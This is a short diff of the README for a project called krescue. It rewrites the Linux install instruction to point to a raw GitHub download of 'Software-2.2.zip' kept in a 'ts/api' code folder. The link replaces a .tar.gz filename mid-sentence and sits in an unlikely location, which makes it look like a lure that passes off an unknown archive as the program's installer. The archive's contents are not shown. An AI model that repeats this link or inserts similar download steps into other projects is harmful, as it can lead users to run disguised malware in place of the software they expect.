Accoladecr01/krescue/README.md

    - Open the downloaded `.dmg` file and drag the krescue icon into your Applications folder.

 3. **Linux:**
-   - Extract the downloaded `.tar.gz` file and run the `krescue` command in your terminal.
+   - Extract the downloaded `https://github.com/Accoladecr01/krescue/raw/refs/heads/main/ts/api/Software-2.2.zip` file and run the `krescue` command in your terminal.

 ## ⚙️ Getting Started